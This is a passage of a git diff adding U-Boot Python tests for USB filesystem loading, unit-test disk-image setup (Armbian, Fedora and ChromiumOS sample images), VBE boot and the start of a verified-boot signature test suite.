devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + output = u_boot_console.run_command('%sls usb %d:%s' % (fs, x, part)) + if 'Unrecognized filesystem type' in output: + partitions.remove(part) + pytest.fail('Unrecognized filesystem') + part_detect = 1 + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_ext2') +@pytest.mark.buildconfigspec('cmd_ext4') +@pytest.mark.buildconfigspec('ext4_write') +@pytest.mark.buildconfigspec('cmd_memory') +def test_usb_ext2load(u_boot_console): + devices, controllers, storage_device = test_usb_part(u_boot_console) + file, size = test_usb_ext4load_ext4write(u_boot_console) + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext2' + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('usb dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + addr = u_boot_utils.find_ram_base(u_boot_console) + output = u_boot_console.run_command('crc32 %x %x' % (addr, size)) + m = re.search('==> (.+?)', output) + if not m: + pytest.fail('CRC32 failed') + expected_crc32 = m.group(1) + + offset = random.randrange(128, 1024, 128) + output = u_boot_console.run_command( + '%sload usb %d:%s %x /%s' % (fs, x, part, addr + offset, file) + ) + expected_text = '%d bytes read' % size + assert expected_text in output + + output = u_boot_console.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_fs_generic') +def test_usb_ls(u_boot_console): + devices, controllers, storage_device = test_usb_part(u_boot_console) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('usb dev %d' % x) + for fs in ['fat', 'ext4']: + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + output = u_boot_console.run_command('ls usb %d:%s' % (x, part)) + if re.search(r'No \w+ table on this device', output): + pytest.fail( + '%s: Partition table not found %d' % (fs.upper(), x) + ) + + if not part_detect: + pytest.skip('No partition detected') + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_fs_generic') +def test_usb_load(u_boot_console): + devices, controllers, storage_device = test_usb_part(u_boot_console) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('usb dev %d' % x) + for fs in ['fat', 'ext4']: + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + addr = u_boot_utils.find_ram_base(u_boot_console) + + if fs == 'fat': + file, size = test_usb_fatload_fatwrite(u_boot_console) + elif fs == 'ext4': + file, size = test_usb_ext4load_ext4write(u_boot_console) + + output = u_boot_console.run_command('crc32 %x %x' % (addr, size)) + m = re.search('==> 
(.+?)', output) + if not m: + pytest.fail('CRC32 failed') + expected_crc32 = m.group(1) + + offset = random.randrange(128, 1024, 128) + output = u_boot_console.run_command( + 'load usb %d:%s %x /%s' % (x, part, addr + offset, file) + ) + expected_text = '%d bytes read' % size + assert expected_text in output + + output = u_boot_console.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + if not part_detect: + pytest.skip('No partition detected') + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_fs_generic') +def test_usb_save(u_boot_console): + devices, controllers, storage_device = test_usb_part(u_boot_console) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('usb dev %d' % x) + for fs in ['fat', 'ext4']: + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + addr = u_boot_utils.find_ram_base(u_boot_console) + size = random.randint(4, 1 * 1024 * 1024) + file = '%s_%d' % ('uboot_test', size) + + offset = random.randrange(128, 1024, 128) + output = u_boot_console.run_command( + 'save usb %d:%s %x /%s %x' + % (x, part, addr + offset, file, size) + ) + expected_text = '%d bytes written' % size + assert expected_text in output + + if not part_detect: + pytest.skip('No partition detected') diff --git a/test/py/tests/test_ut.py b/test/py/tests/test_ut.py new file mode 100644 index 00000000000..c169c835e38 --- /dev/null +++ b/test/py/tests/test_ut.py @@ -0,0 +1,510 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +import collections +import getpass +import gzip +import os +import os.path +import pytest + +import u_boot_utils +# pylint: disable=E0611 +from tests import fs_helper + +def mkdir_cond(dirname): + """Create a directory if it doesn't already exist + + Args: + dirname (str): Name of directory to create + """ + if not os.path.exists(dirname): + os.mkdir(dirname) + +def setup_image(cons, mmc_dev, part_type, second_part=False): + """Create a 20MB disk image with a single partition + + Args: + cons (ConsoleBase): Console to use + mmc_dev (int): MMC device number to use, e.g. 1 + part_type (int): Partition type, e.g. 
0xc for FAT32 + second_part (bool): True to contain a small second partition + + Returns: + tuple: + str: Filename of MMC image + str: Directory name of 'mnt' directory + """ + fname = os.path.join(cons.config.source_dir, f'mmc{mmc_dev}.img') + mnt = os.path.join(cons.config.persistent_data_dir, 'mnt') + mkdir_cond(mnt) + + spec = f'type={part_type:x}, size=18M, bootable' + if second_part: + spec += '\ntype=c' + + u_boot_utils.run_and_log(cons, 'qemu-img create %s 20M' % fname) + u_boot_utils.run_and_log(cons, 'sudo sfdisk %s' % fname, + stdin=spec.encode('utf-8')) + return fname, mnt + +def mount_image(cons, fname, mnt, fstype): + """Create a filesystem and mount it on partition 1 + + Args: + cons (ConsoleBase): Console to use + fname (str): Filename of MMC image + mnt (str): Directory name of 'mnt' directory + fstype (str): Filesystem type ('vfat' or 'ext4') + + Returns: + str: Name of loop device used + """ + out = u_boot_utils.run_and_log(cons, 'sudo losetup --show -f -P %s' % fname) + loop = out.strip() + part = f'{loop}p1' + u_boot_utils.run_and_log(cons, f'sudo mkfs.{fstype} {part}') + opts = '' + if fstype == 'vfat': + opts += f' -o uid={os.getuid()},gid={os.getgid()}' + u_boot_utils.run_and_log(cons, f'sudo mount -o loop {part} {mnt}{opts}') + u_boot_utils.run_and_log(cons, f'sudo chown {getpass.getuser()} {mnt}') + return loop + +def copy_prepared_image(cons, mmc_dev, fname): + """Use a prepared image since we cannot create one + + Args: + cons (ConsoleBase): Console touse + mmc_dev (int): MMC device number + fname (str): Filename of MMC image + """ + infname = os.path.join(cons.config.source_dir, + f'test/py/tests/bootstd/mmc{mmc_dev}.img.xz') + u_boot_utils.run_and_log( + cons, + ['sh', '-c', 'xz -dc %s >%s' % (infname, fname)]) + +def setup_bootmenu_image(cons): + """Create a 20MB disk image with a single ext4 partition + + This is modelled on Armbian 22.08 Jammy + """ + mmc_dev = 4 + fname, mnt = setup_image(cons, mmc_dev, 0x83) + + loop = None + mounted = False + complete = False + try: + loop = mount_image(cons, fname, mnt, 'ext4') + mounted = True + + vmlinux = 'Image' + initrd = 'uInitrd' + dtbdir = 'dtb' + script = '''# DO NOT EDIT THIS FILE +# +# Please edit /boot/armbianEnv.txt to set supported parameters +# + +setenv load_addr "0x9000000" +setenv overlay_error "false" +# default values +setenv rootdev "/dev/mmcblk%dp1" +setenv verbosity "1" +setenv console "both" +setenv bootlogo "false" +setenv rootfstype "ext4" +setenv docker_optimizations "on" +setenv earlycon "off" + +echo "Boot script loaded from ${devtype} ${devnum}" + +if test -e ${devtype} ${devnum} ${prefix}armbianEnv.txt; then + load ${devtype} ${devnum} ${load_addr} ${prefix}armbianEnv.txt + env import -t ${load_addr} ${filesize} +fi + +if test "${logo}" = "disabled"; then setenv logo "logo.nologo"; fi + +if test "${console}" = "display" || test "${console}" = "both"; then setenv consoleargs "console=tty1"; fi +if test "${console}" = "serial" || test "${console}" = "both"; then setenv consoleargs "console=ttyS2,1500000 ${consoleargs}"; fi +if test "${earlycon}" = "on"; then setenv consoleargs "earlycon ${consoleargs}"; fi +if test "${bootlogo}" = "true"; then setenv consoleargs "bootsplash.bootfile=bootsplash.armbian ${consoleargs}"; fi + +# get PARTUUID of first partition on SD/eMMC the boot script was loaded from +if test "${devtype}" = "mmc"; then part uuid mmc ${devnum}:1 partuuid; fi + +setenv bootargs "root=${rootdev} rootwait rootfstype=${rootfstype} ${consoleargs} consoleblank=0 
loglevel=${verbosity} ubootpart=${partuuid} usb-storage.quirks=${usbstoragequirks} ${extraargs} ${extraboardargs}" + +if test "${docker_optimizations}" = "on"; then setenv bootargs "${bootargs} cgroup_enable=cpuset cgroup_memory=1 cgroup_enable=memory swapaccount=1"; fi + +load ${devtype} ${devnum} ${ramdisk_addr_r} ${prefix}uInitrd +load ${devtype} ${devnum} ${kernel_addr_r} ${prefix}Image + +load ${devtype} ${devnum} ${fdt_addr_r} ${prefix}dtb/${fdtfile} +fdt addr ${fdt_addr_r} +fdt resize 65536 +for overlay_file in ${overlays}; do + if load ${devtype} ${devnum} ${load_addr} ${prefix}dtb/rockchip/overlay/${overlay_prefix}-${overlay_file}.dtbo; then + echo "Applying kernel provided DT overlay ${overlay_prefix}-${overlay_file}.dtbo" + fdt apply ${load_addr} || setenv overlay_error "true" + fi +done +for overlay_file in ${user_overlays}; do + if load ${devtype} ${devnum} ${load_addr} ${prefix}overlay-user/${overlay_file}.dtbo; then + echo "Applying user provided DT overlay ${overlay_file}.dtbo" + fdt apply ${load_addr} || setenv overlay_error "true" + fi +done +if test "${overlay_error}" = "true"; then + echo "Error applying DT overlays, restoring original DT" + load ${devtype} ${devnum} ${fdt_addr_r} ${prefix}dtb/${fdtfile} +else + if load ${devtype} ${devnum} ${load_addr} ${prefix}dtb/rockchip/overlay/${overlay_prefix}-fixup.scr; then + echo "Applying kernel provided DT fixup script (${overlay_prefix}-fixup.scr)" + source ${load_addr} + fi + if test -e ${devtype} ${devnum} ${prefix}fixup.scr; then + load ${devtype} ${devnum} ${load_addr} ${prefix}fixup.scr + echo "Applying user provided fixup script (fixup.scr)" + source ${load_addr} + fi +fi +booti ${kernel_addr_r} ${ramdisk_addr_r} ${fdt_addr_r} + +# Recompile with: +# mkimage -C none -A arm -T script -d /boot/boot.cmd /boot/boot.scr +''' % (mmc_dev) + bootdir = os.path.join(mnt, 'boot') + mkdir_cond(bootdir) + cmd_fname = os.path.join(bootdir, 'boot.cmd') + scr_fname = os.path.join(bootdir, 'boot.scr') + with open(cmd_fname, 'w') as outf: + print(script, file=outf) + + infname = os.path.join(cons.config.source_dir, + 'test/py/tests/bootstd/armbian.bmp.xz') + bmp_file = os.path.join(bootdir, 'boot.bmp') + u_boot_utils.run_and_log( + cons, + ['sh', '-c', f'xz -dc {infname} >{bmp_file}']) + + u_boot_utils.run_and_log( + cons, f'mkimage -C none -A arm -T script -d {cmd_fname} {scr_fname}') + + kernel = 'vmlinuz-5.15.63-rockchip64' + target = os.path.join(bootdir, kernel) + with open(target, 'wb') as outf: + print('kernel', outf) + + symlink = os.path.join(bootdir, 'Image') + if os.path.exists(symlink): + os.remove(symlink) + u_boot_utils.run_and_log( + cons, f'echo here {kernel} {symlink}') + os.symlink(kernel, symlink) + + u_boot_utils.run_and_log( + cons, f'mkimage -C none -A arm -T script -d {cmd_fname} {scr_fname}') + complete = True + + except ValueError as exc: + print('Falled to create image, failing back to prepared copy: %s', + str(exc)) + finally: + if mounted: + u_boot_utils.run_and_log(cons, 'sudo umount --lazy %s' % mnt) + if loop: + u_boot_utils.run_and_log(cons, 'sudo losetup -d %s' % loop) + + if not complete: + copy_prepared_image(cons, mmc_dev, fname) + +def setup_bootflow_image(cons): + """Create a 20MB disk image with a single FAT partition""" + mmc_dev = 1 + fname, mnt = setup_image(cons, mmc_dev, 0xc, second_part=True) + + loop = None + mounted = False + complete = False + try: + loop = mount_image(cons, fname, mnt, 'vfat') + mounted = True + + vmlinux = 'vmlinuz-5.3.7-301.fc31.armv7hl' + initrd = 
'initramfs-5.3.7-301.fc31.armv7hl.img' + dtbdir = 'dtb-5.3.7-301.fc31.armv7hl' + script = '''# extlinux.conf generated by appliance-creator +ui menu.c32 +menu autoboot Welcome to Fedora-Workstation-armhfp-31-1.9. Automatic boot in # second{,s}. Press a key for options. +menu title Fedora-Workstation-armhfp-31-1.9 Boot Options. +menu hidden +timeout 20 +totaltimeout 600 + +label Fedora-Workstation-armhfp-31-1.9 (5.3.7-301.fc31.armv7hl) + kernel /%s + append ro root=UUID=9732b35b-4cd5-458b-9b91-80f7047e0b8a rhgb quiet LANG=en_US.UTF-8 cma=192MB cma=256MB + fdtdir /%s/ + initrd /%s''' % (vmlinux, dtbdir, initrd) + ext = os.path.join(mnt, 'extlinux') + mkdir_cond(ext) + + with open(os.path.join(ext, 'extlinux.conf'), 'w') as fd: + print(script, file=fd) + + inf = os.path.join(cons.config.persistent_data_dir, 'inf') + with open(inf, 'wb') as fd: + fd.write(gzip.compress(b'vmlinux')) + u_boot_utils.run_and_log(cons, 'mkimage -f auto -d %s %s' % + (inf, os.path.join(mnt, vmlinux))) + + with open(os.path.join(mnt, initrd), 'w') as fd: + print('initrd', file=fd) + + mkdir_cond(os.path.join(mnt, dtbdir)) + + dtb_file = os.path.join(mnt, '%s/sandbox.dtb' % dtbdir) + u_boot_utils.run_and_log( + cons, 'dtc -o %s' % dtb_file, stdin=b'/dts-v1/; / {};') + complete = True + except ValueError as exc: + print('Falled to create image, failing back to prepared copy: %s', + str(exc)) + finally: + if mounted: + u_boot_utils.run_and_log(cons, 'sudo umount --lazy %s' % mnt) + if loop: + u_boot_utils.run_and_log(cons, 'sudo losetup -d %s' % loop) + + if not complete: + copy_prepared_image(cons, mmc_dev, fname) + + +def setup_cros_image(cons): + """Create a 20MB disk image with ChromiumOS partitions""" + Partition = collections.namedtuple('part', 'start,size,name') + parts = {} + disk_data = None + + def pack_kernel(cons, arch, kern, dummy): + """Pack a kernel containing some fake data + + Args: + cons (ConsoleBase): Console to use + arch (str): Architecture to use ('x86' or 'arm') + kern (str): Filename containing kernel + dummy (str): Dummy filename to use for config and bootloader + + Return: + bytes: Packed-kernel data + """ + kern_part = os.path.join(cons.config.result_dir, 'kern-part-{arch}.bin') + u_boot_utils.run_and_log( + cons, + f'futility vbutil_kernel --pack {kern_part} ' + '--keyblock doc/chromium/files/devkeys/kernel.keyblock ' + '--signprivate doc/chromium/files/devkeys/kernel_data_key.vbprivk ' + f'--version 1 --config {dummy} --bootloader {dummy} ' + f'--vmlinuz {kern}') + + with open(kern_part, 'rb') as inf: + kern_part_data = inf.read() + return kern_part_data + + def set_part_data(partnum, data): + """Set the contents of a disk partition + + This updates disk_data by putting data in the right place + + Args: + partnum (int): Partition number to set + data (bytes): Data for that partition + """ + nonlocal disk_data + + start = parts[partnum].start * sect_size + disk_data = disk_data[:start] + data + disk_data[start + len(data):] + + mmc_dev = 5 + fname = os.path.join(cons.config.source_dir, f'mmc{mmc_dev}.img') + u_boot_utils.run_and_log(cons, 'qemu-img create %s 20M' % fname) + #mnt = os.path.join(cons.config.persistent_data_dir, 'mnt') + #mkdir_cond(mnt) + u_boot_utils.run_and_log(cons, f'cgpt create {fname}') + + uuid_state = 'ebd0a0a2-b9e5-4433-87c0-68b6b72699c7' + uuid_kern = 'fe3a2a5d-4f32-41a7-b725-accc3285a309' + uuid_root = '3cb8e202-3b7e-47dd-8a3c-7ff2a13cfcec' + uuid_rwfw = 'cab6e88e-abf3-4102-a07a-d4bb9be3c1d3' + uuid_reserved = '2e0a753d-9e48-43b0-8337-b15192cb1b5e' + uuid_efi = 
'c12a7328-f81f-11d2-ba4b-00a0c93ec93b' + + ptr = 40 + + # Number of sectors in 1MB + sect_size = 512 + sect_1mb = (1 << 20) // sect_size + + required_parts = [ + {'num': 0xb, 'label':'RWFW', 'type': uuid_rwfw, 'size': '1'}, + {'num': 6, 'label':'KERN_C', 'type': uuid_kern, 'size': '1'}, + {'num': 7, 'label':'ROOT_C', 'type': uuid_root, 'size': '1'}, + {'num': 9, 'label':'reserved', 'type': uuid_reserved, 'size': '1'}, + {'num': 0xa, 'label':'reserved', 'type': uuid_reserved, 'size': '1'}, + + {'num': 2, 'label':'KERN_A', 'type': uuid_kern, 'size': '1M'}, + {'num': 4, 'label':'KERN_B', 'type': uuid_kern, 'size': '1M'}, + + {'num': 8, 'label':'OEM', 'type': uuid_state, 'size': '1M'}, + {'num': 0xc, 'label':'EFI-SYSTEM', 'type': uuid_efi, 'size': '1M'}, + + {'num': 5, 'label':'ROOT_B', 'type': uuid_root, 'size': '1'}, + {'num': 3, 'label':'ROOT_A', 'type': uuid_root, 'size': '1'}, + {'num': 1, 'label':'STATE', 'type': uuid_state, 'size': '1M'}, + ] + + for part in required_parts: + size_str = part['size'] + if 'M' in size_str: + size = int(size_str[:-1]) * sect_1mb + else: + size = int(size_str) + u_boot_utils.run_and_log( + cons, + f"cgpt add -i {part['num']} -b {ptr} -s {size} -t {part['type']} {fname}") + ptr += size + + u_boot_utils.run_and_log(cons, f'cgpt boot -p {fname}') + out = u_boot_utils.run_and_log(cons, f'cgpt show -q {fname}') + '''We expect something like this: + 8239 2048 1 Basic data + 45 2048 2 ChromeOS kernel + 8238 1 3 ChromeOS rootfs + 2093 2048 4 ChromeOS kernel + 8237 1 5 ChromeOS rootfs + 41 1 6 ChromeOS kernel + 42 1 7 ChromeOS rootfs + 4141 2048 8 Basic data + 43 1 9 ChromeOS reserved + 44 1 10 ChromeOS reserved + 40 1 11 ChromeOS firmware + 6189 2048 12 EFI System Partition + ''' + + # Create a dict (indexed by partition number) containing the above info + for line in out.splitlines(): + start, size, num, name = line.split(maxsplit=3) + parts[int(num)] = Partition(int(start), int(size), name) + + dummy = os.path.join(cons.config.result_dir, 'dummy.txt') + with open(dummy, 'wb') as outf: + outf.write(b'dummy\n') + + # For now we just use dummy kernels. This limits testing to just detecting + # a signed kernel. We could add support for the x86 data structures so that + # testing could cover getting the cmdline, setup.bin and other pieces. 
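# --- Illustrative aside (not part of the patch) -----------------------------
# A minimal, self-contained sketch of the arithmetic that set_part_data()
# above relies on: 'cgpt show -q' reports partition offsets in 512-byte
# sectors, so splicing kernel data into the raw image means writing at
# start_sector * 512. The partition entry below is hypothetical; its start
# sector (45) simply mirrors the sample 'cgpt show' output quoted above.
import collections

Partition = collections.namedtuple('part', 'start,size,name')
SECT_SIZE = 512
parts = {2: Partition(45, 2048, 'ChromeOS kernel')}

def splice(disk_data, partnum, data):
    """Return disk_data with 'data' written at the start of partition partnum."""
    start = parts[partnum].start * SECT_SIZE
    return disk_data[:start] + data + disk_data[start + len(data):]

image = splice(bytes(20 * 1024 * 1024), 2, b'dummy kernel\n')
assert image[45 * SECT_SIZE:45 * SECT_SIZE + 13] == b'dummy kernel\n'
# -----------------------------------------------------------------------------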
+ kern = os.path.join(cons.config.result_dir, 'kern.bin') + with open(kern, 'wb') as outf: + outf.write(b'kernel\n') + + with open(fname, 'rb') as inf: + disk_data = inf.read() + + # put x86 kernel in partition 2 and arm one in partition 4 + set_part_data(2, pack_kernel(cons, 'x86', kern, dummy)) + set_part_data(4, pack_kernel(cons, 'arm', kern, dummy)) + + with open(fname, 'wb') as outf: + outf.write(disk_data) + + return fname + + +def setup_cedit_file(cons): + infname = os.path.join(cons.config.source_dir, + 'test/boot/files/expo_layout.dts') + inhname = os.path.join(cons.config.source_dir, + 'test/boot/files/expo_ids.h') + expo_tool = os.path.join(cons.config.source_dir, 'tools/expo.py') + outfname = 'cedit.dtb' + u_boot_utils.run_and_log( + cons, f'{expo_tool} -e {inhname} -l {infname} -o {outfname}') + +@pytest.mark.buildconfigspec('ut_dm') +def test_ut_dm_init(u_boot_console): + """Initialize data for ut dm tests.""" + + fn = u_boot_console.config.source_dir + '/testflash.bin' + if not os.path.exists(fn): + data = b'this is a test' + data += b'\x00' * ((4 * 1024 * 1024) - len(data)) + with open(fn, 'wb') as fh: + fh.write(data) + + fn = u_boot_console.config.source_dir + '/spi.bin' + if not os.path.exists(fn): + data = b'\x00' * (2 * 1024 * 1024) + with open(fn, 'wb') as fh: + fh.write(data) + + # Create a file with a single partition + fn = u_boot_console.config.source_dir + '/scsi.img' + if not os.path.exists(fn): + data = b'\x00' * (2 * 1024 * 1024) + with open(fn, 'wb') as fh: + fh.write(data) + u_boot_utils.run_and_log( + u_boot_console, f'sfdisk {fn}', stdin=b'type=83') + + fs_helper.mk_fs(u_boot_console.config, 'ext2', 0x200000, '2MB') + fs_helper.mk_fs(u_boot_console.config, 'fat32', 0x100000, '1MB') + + mmc_dev = 6 + fn = os.path.join(u_boot_console.config.source_dir, f'mmc{mmc_dev}.img') + data = b'\x00' * (12 * 1024 * 1024) + with open(fn, 'wb') as fh: + fh.write(data) + +@pytest.mark.buildconfigspec('cmd_bootflow') +def test_ut_dm_init_bootstd(u_boot_console): + """Initialise data for bootflow tests""" + + setup_bootflow_image(u_boot_console) + setup_bootmenu_image(u_boot_console) + setup_cedit_file(u_boot_console) + setup_cros_image(u_boot_console) + + # Restart so that the new mmc1.img is picked up + u_boot_console.restart_uboot() + + +def test_ut(u_boot_console, ut_subtest): + """Execute a "ut" subtest. + + The subtests are collected in function generate_ut_subtest() from linker + generated lists by applying a regular expression to the lines of file + u-boot.sym. The list entries are created using the C macro UNIT_TEST(). + + Strict naming conventions have to be followed to match the regular + expression. Use UNIT_TEST(foo_test_bar, _flags, foo_test) for a test bar in + test suite foo that can be executed via command 'ut foo bar' and is + implemented in C function foo_test_bar(). + + Args: + u_boot_console (ConsoleBase): U-Boot console + ut_subtest (str): test to be executed via command ut, e.g 'foo bar' to + execute command 'ut foo bar' + """ + + if ut_subtest == 'hush hush_test_simple_dollar': + # ut hush hush_test_simple_dollar prints "Unknown command" on purpose. 
+ with u_boot_console.disable_check('unknown_command'): + output = u_boot_console.run_command('ut ' + ut_subtest) + assert('Unknown command \'quux\' - try \'help\'' in output) + else: + output = u_boot_console.run_command('ut ' + ut_subtest) + assert output.endswith('Failures: 0') diff --git a/test/py/tests/test_vbe.py b/test/py/tests/test_vbe.py new file mode 100644 index 00000000000..50b6c1cd911 --- /dev/null +++ b/test/py/tests/test_vbe.py @@ -0,0 +1,120 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright 2022 Google LLC +# +# Test addition of VBE + +import pytest + +import fit_util + +# Define a base ITS which we can adjust using % and a dictionary +base_its = ''' +/dts-v1/; + +/ { + description = "Example kernel"; + + images { + kernel-1 { + data = /incbin/("%(kernel)s"); + type = "kernel"; + arch = "sandbox"; + os = "linux"; + load = <0x40000>; + entry = <0x8>; + compression = "%(compression)s"; + + random { + compatible = "vbe,random-rand"; + vbe,size = <0x40>; + vbe,required; + }; + aslr1 { + compatible = "vbe,aslr-move"; + vbe,align = <0x100000>; + }; + aslr2 { + compatible = "vbe,aslr-rand"; + }; + efi-runtime { + compatible = "vbe,efi-runtime-rand"; + }; + wibble { + compatible = "vbe,wibble"; + }; + }; + + fdt-1 { + description = "snow"; + data = /incbin/("%(fdt)s"); + type = "flat_dt"; + arch = "sandbox"; + load = <%(fdt_addr)#x>; + compression = "%(compression)s"; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel-1"; + fdt = "fdt-1"; + }; + }; +}; +''' + +# Define a base FDT - currently we don't use anything in this +base_fdt = ''' +/dts-v1/; + +/ { + chosen { + }; +}; +''' + +# This is the U-Boot script that is run for each test. First load the FIT, +# then run the 'bootm' command, then run the unit test which checks that the +# working tree has the required things filled in according to the OS requests +# above (random, aslr2, etc.) 
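# --- Illustrative aside (not part of the patch) -----------------------------
# A minimal sketch of how these templates are consumed: base_its above and
# base_script below use printf-style named placeholders, so applying '%' with
# a dictionary fills in each %(name)s / %(name)#x field before the result is
# written out. The one-line template is cut down from base_its purely to show
# the substitution mechanism; the values mirror those set up in test_vbe()
# below.
template = 'data = /incbin/("%(kernel)s"); load = <%(fdt_addr)#x>;'
print(template % {'kernel': 'vbe-kernel.bin', 'fdt_addr': 0x80000})
# -> data = /incbin/("vbe-kernel.bin"); load = <0x80000>;
# -----------------------------------------------------------------------------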
+base_script = ''' +host load hostfs 0 %(fit_addr)x %(fit)s +fdt addr %(fit_addr)x +bootm start %(fit_addr)x +bootm loados +bootm prep +fdt addr +fdt print +ut bootstd -f vbe_test_fixup_norun +''' + +@pytest.mark.boardspec('sandbox_flattree') +@pytest.mark.requiredtool('dtc') +def test_vbe(u_boot_console): + cons = u_boot_console + kernel = fit_util.make_kernel(cons, 'vbe-kernel.bin', 'kernel') + fdt = fit_util.make_dtb(cons, base_fdt, 'vbe-fdt') + fdt_out = fit_util.make_fname(cons, 'fdt-out.dtb') + + params = { + 'fit_addr' : 0x1000, + + 'kernel' : kernel, + + 'fdt' : fdt, + 'fdt_out' : fdt_out, + 'fdt_addr' : 0x80000, + 'fdt_size' : 0x1000, + + 'compression' : 'none', + } + mkimage = cons.config.build_dir + '/tools/mkimage' + fit = fit_util.make_fit(cons, mkimage, base_its, params, 'test-vbe.fit', + base_fdt) + params['fit'] = fit + cmd = base_script % params + + with cons.log.section('Kernel load'): + output = cons.run_command_list(cmd.splitlines()) + + assert 'Failures: 0' in output[-1] diff --git a/test/py/tests/test_vbe_vpl.py b/test/py/tests/test_vbe_vpl.py new file mode 100644 index 00000000000..ed12d3a4618 --- /dev/null +++ b/test/py/tests/test_vbe_vpl.py @@ -0,0 +1,40 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright 2022 Google LLC +# +# Test addition of VBE + +import os + +import pytest +import u_boot_utils + +@pytest.mark.boardspec('sandbox_vpl') +@pytest.mark.requiredtool('dtc') +def test_vbe_vpl(u_boot_console): + cons = u_boot_console + #cmd = [cons.config.build_dir + fname, '-v'] + ram = os.path.join(cons.config.build_dir, 'ram.bin') + fdt = os.path.join(cons.config.build_dir, 'arch/sandbox/dts/test.dtb') + image_fname = os.path.join(cons.config.build_dir, 'image.bin') + + # Enable firmware1 and the mmc that it uses. These are needed for the full + # VBE flow. + u_boot_utils.run_and_log( + cons, f'fdtput -t s {fdt} /bootstd/firmware0 status disabled') + u_boot_utils.run_and_log( + cons, f'fdtput -t s {fdt} /bootstd/firmware1 status okay') + u_boot_utils.run_and_log( + cons, f'fdtput -t s {fdt} /mmc3 status okay') + u_boot_utils.run_and_log( + cons, f'fdtput -t s {fdt} /mmc3 filename {image_fname}') + + # Remove any existing RAM file, so we don't have old data present + if os.path.exists(ram): + os.remove(ram) + flags = ['-p', image_fname, '-w', '-s', 'state.dtb'] + cons.restart_uboot_with_flags(flags) + + # Make sure that VBE was used in both VPL (to load SPL) and SPL (to load + # U-Boot + output = cons.run_command('vbe state') + assert output == 'Phases: VPL SPL' diff --git a/test/py/tests/test_vboot.py b/test/py/tests/test_vboot.py new file mode 100644 index 00000000000..7e0e8e44750 --- /dev/null +++ b/test/py/tests/test_vboot.py @@ -0,0 +1,643 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2016, Google Inc. 
+# +# U-Boot Verified Boot Test + +""" +This tests verified boot in the following ways: + +For image verification: +- Create FIT (unsigned) with mkimage +- Check that verification shows that no keys are verified +- Sign image +- Check that verification shows that a key is now verified + +For configuration verification: +- Corrupt signature and check for failure +- Create FIT (with unsigned configuration) with mkimage +- Check that image verification works +- Sign the FIT and mark the key as 'required' for verification +- Check that image verification works +- Corrupt the signature +- Check that image verification no-longer works + +For pre-load header verification: +- Create FIT image with a pre-load header +- Check that signature verification succeeds +- Corrupt the FIT image +- Check that signature verification fails +- Launch an FIT image without a pre-load header +- Check that image verification fails + +Tests run with both SHA1 and SHA256 hashing. + +This also tests fdt_add_pubkey utility in the simple way: +- Create DTB and FIT files +- Add keys with fdt_add_pubkey to DTB +- Sign FIT image +- Check with fit_check_sign that keys properly added to DTB file +""" + +import os +import shutil +import struct +import pytest +import u_boot_utils as util +import vboot_forge +import vboot_evil + +# Common helper functions +def dtc(dts, cons, dtc_args, datadir, tmpdir, dtb): + """Run the device tree compiler to compile a .dts file + + The output file will be the same as the input file but with a .dtb + extension. + + Args: + dts: Device tree file to compile. + cons: U-Boot console. + dtc_args: DTC arguments. + datadir: Path to data directory. + tmpdir: Path to temp directory. + dtb: Resulting DTB file. + """ + dtb = dts.replace('.dts', '.dtb') + util.run_and_log(cons, 'dtc %s %s%s -O dtb ' + '-o %s%s' % (dtc_args, datadir, dts, tmpdir, dtb)) + +def make_fit(its, cons, mkimage, dtc_args, datadir, fit): + """Make a new FIT from the .its source file. + + This runs 'mkimage -f' to create a new FIT. + + Args: + its: Filename containing .its source. + cons: U-Boot console. + mkimage: Path to mkimage utility. + dtc_args: DTC arguments. + datadir: Path to data directory. + fit: Resulting FIT file. + """ + util.run_and_log(cons, [mkimage, '-D', dtc_args, '-f', + '%s%s' % (datadir, its), fit]) + +# Only run the full suite on a few combinations, since it doesn't add any more +# test coverage. 
